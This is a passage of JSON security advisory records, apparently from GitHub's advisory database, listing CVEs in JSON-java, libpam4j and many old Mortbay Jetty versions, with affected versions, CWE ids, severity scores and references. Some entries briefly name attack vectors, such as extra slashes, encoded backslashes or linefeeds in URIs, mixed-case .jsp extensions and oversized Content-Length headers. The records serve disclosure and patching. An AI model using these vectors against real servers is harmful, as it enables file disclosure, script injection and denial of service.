"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-4jq9-2xhw-jpx7/GHSA-4jq9-2xhw-jpx7.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/google/security-research/security/advisories/GHSA-4jq9-2xhw-jpx7" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5072" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/issues/758" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/issues/771" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/pull/759" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/commit/60662e2f8384d3449822a3a1179bfe8de67b55bb" }, { "type": "PACKAGE", "url": "https://github.com/stleary/JSON-java" } ], "database_specific": { "cwe_ids": [ "CWE-358" ], "github_reviewed": true, "github_reviewed_at": "2023-11-14T22:24:08Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x9rg-q5fx-fx66", 
"published": "2022-05-13T01:38:10Z", "modified": "2023-11-08T03:58:52.089972Z", "aliases": [ "CVE-2017-12197" ], "summary": "Improper Input Validation in libpam4j", "details": "It was found that libpam4j prior to 1.10 did not properly validate user accounts when authenticating. A user with a valid password for a disabled account would be able to bypass security restrictions and possibly access sensitive information.", "affected": [ { "package": { "name": "org.kohsuke:libpam4j", "ecosystem": "Maven", "purl": "pkg:maven/org.kohsuke/libpam4j" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.10" } ] } ], "versions": [ "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-x9rg-q5fx-fx66/GHSA-x9rg-q5fx-fx66.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12197" }, { "type": "WEB", "url": "https://github.com/kohsuke/libpam4j/issues/18" }, { "type": "WEB", "url": "https://github.com/kohsuke/libpam4j/commit/02ffdff218283629ba4a902e7fe2fd44646abc21" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2904" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2905" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2906" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1503103" }, { "type": "PACKAGE", "url": "https://github.com/kohsuke/libpam4j" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2017/11/msg00008.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2017/dsa-4025" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T21:27:13Z", "nvd_published_at": "2018-01-18T21:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, 
{ "schema_version": "1.7.3", "id": "GHSA-4jjw-xrr6-9v3p", "published": "2022-05-01T18:45:22Z", "modified": "2024-12-06T05:26:52.443882Z", "aliases": [ "CVE-2007-6672" ], "summary": "Mortbay Jetty Double Slash URI Information Disclosure Vulnerability", "details": "Mortbay Jetty 6.1.5 and 6.1.6 allows remote attackers to bypass protection mechanisms and read the source of files via multiple `/` (slash) characters in the URI.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.1.5" }, { "fixed": "6.1.7" } ] } ], "versions": [ "6.1.5", "6.1.6", "6.1.6rc0", "6.1.6rc1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.1.6", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-4jjw-xrr6-9v3p/GHSA-4jjw-xrr6-9v3p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-6672" }, { "type": "WEB", "url": "https://web.archive.org/web/20080113051254/http://www.kb.cert.org/vuls/id/553235" }, { "type": "WEB", "url": "https://web.archive.org/web/20080120225723/http://jira.codehaus.org/browse/JETTY-386" }, { "type": "WEB", "url": "https://web.archive.org/web/20080120225728/http://jira.codehaus.org/browse/JETTY/fixforversion/13950" }, { "type": "WEB", "url": "https://web.archive.org/web/20080517012615/http://www.securityfocus.com/bid/27117" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2023-08-22T23:30:03Z", "nvd_published_at": "2008-01-08T11:46:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-5mq8-h82p-wjf2", "published": "2022-04-30T18:21:21Z", "modified": "2024-11-28T05:41:39.980409Z", "aliases": [ "CVE-2002-1533" ], "summary": "Jetty Javascript Inclusion Vulnerability", "details": "Cross-site scripting (XSS) vulnerability in Jetty JSP 
servlet engine allows remote attackers to insert arbitrary HTML or script via an HTTP request to a .jsp file whose name contains the malicious script and some encoded linefeed characters (`%0a`).", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.1" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "test-6.0.0", "test-6.0.0rc3", "test-6.0.0rc4", "test-6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-5mq8-h82p-wjf2/GHSA-5mq8-h82p-wjf2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2002-1533" }, { "type": "WEB", "url": "https://web.archive.org/web/20040705203137/http://xforce.iss.net/xforce/xfdb/10219" }, { "type": "WEB", "url": "https://web.archive.org/web/20041213153950/http://archives.neohapsis.com/archives/bugtraq/2002-09/0337.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20061020173202/http://www.securityfocus.com/bid/5821" } ], "database_specific": { "cwe_ids": [ "CWE-80" ], "github_reviewed": true, "github_reviewed_at": "2024-02-12T20:43:18Z", "nvd_published_at": "2003-03-31T05:00:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-6jxp-7g74-2rc3", "published": "2022-05-02T03:56:13Z", "modified": "2023-11-08T03:56:54.368997Z", "aliases": [ "CVE-2009-4611" ], "summary": "Improper input validation in Mort Bay Jetty", "details": "Mort Bay Jetty 6.x through 6.1.22 and 7.0.0 writes backtrace data without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator, related to (1) a string value in the Age parameter to the default URI for the Cookie Dump Servlet 
in test-jetty-webapp/src/main/java/com/acme/CookieDump.java under cookie/, (2) an alphabetic value in the A parameter to jsp/expr.jsp, or (3) an alphabetic value in the Content-Length HTTP header to an arbitrary application.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.1.23" } ] } ], "versions": [ "6.0.0", "6.0.1", "6.0.2", "6.1.0", "6.1.0pre0", "6.1.0pre1", "6.1.0pre2", "6.1.0pre3", "6.1.0rc0", "6.1.0rc1", "6.1.0rc2", "6.1.0rc3", "6.1.1", "6.1.10", "6.1.11", "6.1.12", "6.1.12.rc2", "6.1.12.rc3", "6.1.12.rc4", "6.1.12.rc5", "6.1.12rc1", "6.1.14", "6.1.15", "6.1.15.pre0", "6.1.15.rc2", "6.1.15.rc3", "6.1.15.rc4", "6.1.15.rc5", "6.1.16", "6.1.17", "6.1.18", "6.1.19", "6.1.1rc0", "6.1.1rc1", "6.1.2", "6.1.20", "6.1.21", "6.1.22", "6.1.2pre0", "6.1.2pre1", "6.1.2rc0", "6.1.2rc1", "6.1.2rc2", "6.1.2rc4", "6.1.2rc5", "6.1.3", "6.1.4", "6.1.4rc0", "6.1.4rc1", "6.1.5", "6.1.5rc0", "6.1.6", "6.1.6rc0", "6.1.6rc1", "6.1.7", "6.1.8", "6.1.9", "6.1H.10", "6.1H.14", "6.1H.14.1", "6.1H.22", "6.1H.4-beta", "6.1H.4rc1", "6.1H.5-beta", "6.1H.6", "6.1H.7", "6.1H.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-6jxp-7g74-2rc3/GHSA-6jxp-7g74-2rc3.json" } }, { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.2" } ] } ], "versions": [ "7.0.0.pre4", "7.0.0.pre5", "7.0.0pre0", "7.0.0pre1", "7.0.0pre2", "7.0.0pre3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-6jxp-7g74-2rc3/GHSA-6jxp-7g74-2rc3.json" } } ], "references": [ { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2009-4611" }, { "type": "WEB", "url": "https://fossies.org/linux/jetty-distribution/VERSION.txt" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://www.eclipse.org/jetty/about.php" }, { "type": "WEB", "url": "http://www.ush.it/team/ush/hack-jetty6x7x/jetty-adv.txt" }, { "type": "WEB", "url": "http://www.ush.it/team/ush/hack_httpd_escape/adv.txt" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-06-10T22:42:57Z", "nvd_published_at": "2010-01-13T20:30:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8h77-9vh5-hw5g", "published": "2022-05-01T18:35:00Z", "modified": "2023-11-08T03:56:48.926359Z", "aliases": [ "CVE-2007-5613" ], "summary": "Mortbay Jetty vulnerable to Cross-site scripting", "details": "Cross-site scripting (XSS) vulnerability in Dump Servlet in Mortbay Jetty before 6.1.6rc1 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters and cookies.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.1.6" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4", "6.0.1", "6.0.2", "6.1.0", "6.1.0pre0", "6.1.0pre1", "6.1.0pre2", "6.1.0pre3", "6.1.0rc0", "6.1.0rc1", "6.1.0rc2", "6.1.0rc3", "6.1.1", "6.1.1rc0", "6.1.1rc1", "6.1.2", "6.1.2pre0", "6.1.2pre1", 
"6.1.2rc0", "6.1.2rc1", "6.1.2rc2", "6.1.2rc4", "6.1.2rc5", "6.1.3", "6.1.4", "6.1.4rc0", "6.1.4rc1", "6.1.5", "6.1.5rc0", "6.1.6rc0", "6.1.6rc1", "6.1H.10", "6.1H.14", "6.1H.14.1", "6.1H.22", "6.1H.4-beta", "6.1H.4rc1", "6.1H.5-beta", "6.1H.6", "6.1H.7", "6.1H.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8h77-9vh5-hw5g/GHSA-8h77-9vh5-hw5g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-5613" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00227.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00250.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/237888" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2022-06-07T23:53:04Z", "nvd_published_at": "2007-12-05T11:46:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-966r-962g-2jq5", "published": "2022-05-01T18:35:01Z", "modified": "2024-12-03T06:26:22.232759Z", "aliases": [ "CVE-2007-5615" ], "summary": "Mortbay Jetty CRLF Injection Vulnerability", "details": "CRLF injection vulnerability in Mortbay Jetty before 6.1.6rc0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.1.6rc0" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0", "6.0.0Beta1", 
"6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4", "6.0.1", "6.0.2", "6.1.0", "6.1.0pre0", "6.1.0pre1", "6.1.0pre2", "6.1.0pre3", "6.1.0rc0", "6.1.0rc1", "6.1.0rc2", "6.1.0rc3", "6.1.1", "6.1.1rc0", "6.1.1rc1", "6.1.2", "6.1.2pre0", "6.1.2pre1", "6.1.2rc0", "6.1.2rc1", "6.1.2rc2", "6.1.2rc4", "6.1.2rc5", "6.1.3", "6.1.4", "6.1.4rc0", "6.1.4rc1", "6.1.5", "6.1.5rc0", "6.1H.10", "6.1H.14", "6.1H.14.1", "6.1H.22", "6.1H.4-beta", "6.1H.4rc1", "6.1H.5-beta", "6.1H.6", "6.1H.7", "6.1H.8", "test-6.0.0", "test-6.0.0rc3", "test-6.0.0rc4", "test-6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-966r-962g-2jq5/GHSA-966r-962g-2jq5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-5615" }, { "type": "WEB", "url": "https://github.com/jetty-project/codehaus-jetty6/commit/0d2592ea3183914163d0921e4855bd3e18582a05" }, { "type": "WEB", "url": "https://web.archive.org/web/20071007232422/http://svn.codehaus.org:80/jetty/jetty/trunk/VERSION.txt" }, { "type": "WEB", "url": "https://web.archive.org/web/20150112202621/http://www.securityfocus.com/bid/26696" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00227.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00250.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/212984" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2023-09-21T23:12:42Z", "nvd_published_at": "2007-12-05T11:46:00Z", "severity": 
"MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-9986-w5h5-vw59", "published": "2022-05-02T03:26:04Z", "modified": "2024-02-16T08:15:58.735824Z", "aliases": [ "CVE-2009-1523" ], "summary": "Directory traversal in Mort Bay Jetty", "details": "Directory traversal vulnerability in the HTTP server in Mort Bay Jetty 5.1.14, 6.x before 6.1.17, and 7.x through 7.0.0.M2 allows remote attackers to access arbitrary files via directory traversal sequences in the URI.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.1.17" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4", "6.0.1", "6.0.2", "6.1.0", "6.1.0pre0", "6.1.0pre1", "6.1.0pre2", "6.1.0pre3", "6.1.0rc0", "6.1.0rc1", "6.1.0rc2", "6.1.0rc3", "6.1.1", "6.1.10", "6.1.11", "6.1.12", "6.1.12.rc2", "6.1.12.rc3", "6.1.12.rc4", "6.1.12.rc5", "6.1.12rc1", "6.1.14", "6.1.15", "6.1.15.pre0", "6.1.15.rc2", "6.1.15.rc3", "6.1.15.rc4", "6.1.15.rc5", "6.1.16", "6.1.1rc0", "6.1.1rc1", "6.1.2", "6.1.2pre0", "6.1.2pre1", "6.1.2rc0", "6.1.2rc1", "6.1.2rc2", "6.1.2rc4", "6.1.2rc5", "6.1.3", "6.1.4", "6.1.4rc0", "6.1.4rc1", "6.1.5", "6.1.5rc0", "6.1.6", "6.1.6rc0", "6.1.6rc1", "6.1.7", "6.1.8", "6.1.9", "6.1H.10", "6.1H.14", "6.1H.14.1", "6.1H.22", "6.1H.4-beta", "6.1H.4rc1", "6.1H.5-beta", "6.1H.6", "6.1H.7", "6.1H.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9986-w5h5-vw59/GHSA-9986-w5h5-vw59.json" } }, { "package": { "name": 
"org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0.M0" }, { "fixed": "7.0.0.M2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9986-w5h5-vw59/GHSA-9986-w5h5-vw59.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-1523" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=499867" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2009-May/msg01257.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2009-May/msg01259.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2009-May/msg01262.html" }, { "type": "WEB", "url": "http://itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02282388" }, { "type": "WEB", "url": "http://jira.codehaus.org/browse/JETTY-1004" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/402580" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/CRDY-7RKQCY" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujul2009-091332.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/34800" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/35675" }, { "type": "WEB", "url": "http://www.securitytracker.com/id?1022563" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2009/1900" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2010/1792" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2023-08-03T17:32:50Z", "nvd_published_at": "2009-05-05T17:30:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": 
"GHSA-cwq3-qp8v-w8q3", "published": "2022-05-01T02:20:38Z", "modified": "2024-11-28T05:34:11.091547Z", "aliases": [ "CVE-2005-3747" ], "summary": "Mortbay Jetty Discloses JSP Source Code", "details": "Unspecified vulnerability in Jetty before 5.1.6 allows remote attackers to obtain source code of JSP pages, possibly involving requests for .jsp files with URL-encoded backslash (`%5C`) characters. NOTE: this might be the same issue as CVE-2006-2758.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "5.1.6" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "test-6.0.0", "test-6.0.0rc3", "test-6.0.0rc4", "test-6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-cwq3-qp8v-w8q3/GHSA-cwq3-qp8v-w8q3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-3747" }, { "type": "WEB", "url": "http://sourceforge.net/project/shownotes.php?release_id=372086\u0026group_id=7322" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/450315/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/15515" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2023-09-18T23:46:51Z", "nvd_published_at": "2005-11-22T11:03:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-fvh3-4v5r-cvvc", "published": "2022-05-01T18:35:01Z", "modified": "2023-11-08T03:56:48.986632Z", "aliases": [ "CVE-2007-5614" ], "summary": "Improper Authentication in Mortbay Jetty", "details": "Mortbay Jetty before 6.1.6rc1 does not properly handle \"certain quote sequences\" in HTML cookie parameters, which allows remote attackers to hijack browser sessions via unspecified vectors.", 
"affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.1.6" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4", "6.0.1", "6.0.2", "6.1.0", "6.1.0pre0", "6.1.0pre1", "6.1.0pre2", "6.1.0pre3", "6.1.0rc0", "6.1.0rc1", "6.1.0rc2", "6.1.0rc3", "6.1.1", "6.1.1rc0", "6.1.1rc1", "6.1.2", "6.1.2pre0", "6.1.2pre1", "6.1.2rc0", "6.1.2rc1", "6.1.2rc2", "6.1.2rc4", "6.1.2rc5", "6.1.3", "6.1.4", "6.1.4rc0", "6.1.4rc1", "6.1.5", "6.1.5rc0", "6.1.6rc0", "6.1.6rc1", "6.1H.10", "6.1H.14", "6.1H.14.1", "6.1H.22", "6.1H.4-beta", "6.1H.4rc1", "6.1H.5-beta", "6.1H.6", "6.1H.7", "6.1H.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fvh3-4v5r-cvvc/GHSA-fvh3-4v5r-cvvc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-5614" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://www.eclipse.org/jetty/about.php" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00227.html" }, { "type": "WEB", "url": "https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00250.html" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/438616" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2022-06-08T22:32:50Z", "nvd_published_at": "2007-12-05T11:46:00Z", "severity": "HIGH" }, "severity": [ { 
"type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mq4x-8whh-jx73", "published": "2022-05-01T07:02:10Z", "modified": "2023-11-08T03:56:46.786542Z", "aliases": [ "CVE-2006-2759" ], "summary": "Improper Input Validation in Mortbay Jetty ", "details": "jetty 6.0.x (jetty6) beta16 allows remote attackers to read arbitrary script source code via a capital P in the .jsp extension, and probably other mixed case manipulations.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.0.0" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "6.0.0Beta1", "6.0.0beta1", "6.0.0beta10", "6.0.0beta11", "6.0.0beta12", "6.0.0beta14", "6.0.0beta15", "6.0.0beta16", "6.0.0beta17", "6.0.0beta2", "6.0.0beta3", "6.0.0beta4", "6.0.0beta5", "6.0.0beta6", "6.0.0beta7", "6.0.0beta8", "6.0.0beta9", "6.0.0rc0", "6.0.0rc1", "6.0.0rc2", "6.0.0rc3", "6.0.0rc4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-mq4x-8whh-jx73/GHSA-mq4x-8whh-jx73.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-2759" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://www.eclipse.org/jetty/about.php" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-06-08T22:32:53Z", "nvd_published_at": "2006-06-02T01:02:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p5rr-q5g6-gm42", "published": "2022-04-29T03:01:19Z", "modified": "2024-11-28T05:30:07.803612Z", "aliases": [ "CVE-2004-2381" ], 
"summary": "Jetty HTTP Server Denial of Service vulnerability", "details": "HttpRequest.java in Jetty HTTP Server before 4.2.19 allows remote attackers to cause denial of service (memory usage and application crash) via HTTP requests with a large Content-Length.", "affected": [ { "package": { "name": "org.mortbay.jetty:jetty", "ecosystem": "Maven", "purl": "pkg:maven/org.mortbay.jetty/jetty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.2.19" } ] } ], "versions": [ "4.1-rc1", "4.1-rc6", "4.2.10", "4.2.12", "4.2.2", "4.2.3", "4.2.9", "test-6.0.0", "test-6.0.0rc3", "test-6.0.0rc4", "test-6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-p5rr-q5g6-gm42/GHSA-p5rr-q5g6-gm42.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2004-2381" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/15537" }, { "type": "WEB", "url": "http://cvs.sourceforge.net/viewcvs.py/jetty/Jetty/src/org/mortbay/http/HttpRequest.java?r1=1.75\u0026r2=1.76" }, { "type": "WEB", "url": "http://sourceforge.net/project/shownotes.php?release_id=224743" }, { "type": "WEB", "url": "http://www.osvdb.org/4387" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-09-18T22:57:43Z", "nvd_published_at": "2004-12-31T05:00:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-qmgj-5h75-jr67", "published": "2022-05-01T07:02:10Z", "modified": "2024-11-28T05:30:12.510709Z", "aliases": [ "CVE-2006-2758" ], "summary": "Jetty Directory Traversal Vulnerability", "details": "Directory traversal vulnerability in jetty 6.0.x (jetty6) beta16 allows remote attackers to read arbitrary files 